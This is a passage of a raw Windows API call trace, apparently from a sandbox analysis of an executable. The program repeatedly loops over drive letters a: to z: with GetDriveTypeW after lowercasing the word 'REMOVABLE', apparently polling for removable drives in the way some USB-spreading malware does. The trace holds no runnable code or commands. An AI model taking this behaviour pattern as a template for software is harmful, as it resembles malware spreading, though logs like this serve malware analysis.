hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0218.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.232] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.232] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.233] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0218.233] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.233] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.233] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.233] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.234] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.234] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.234] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.234] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.234] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.234] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.235] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.235] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.235] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.235] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.236] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.236] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.236] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.236] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.237] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.237] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.237] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.238] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.239] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.239] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.239] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.239] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.240] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.240] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0218.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0218.242] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.242] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.243] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.243] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.243] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.243] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.244] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.244] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.245] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.246] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.246] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.246] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.246] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.246] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.247] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.248] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.248] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0218.248] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0218.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0218.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0218.253] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0218.253] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0218.253] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.253] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.254] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.254] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.254] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.254] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.255] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.255] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.256] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.256] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.256] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.256] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.256] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.257] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.257] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.257] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.257] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.258] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.258] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.258] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.258] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.258] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.259] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.259] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.259] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.262] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.263] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.263] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.263] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.263] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.263] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.263] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 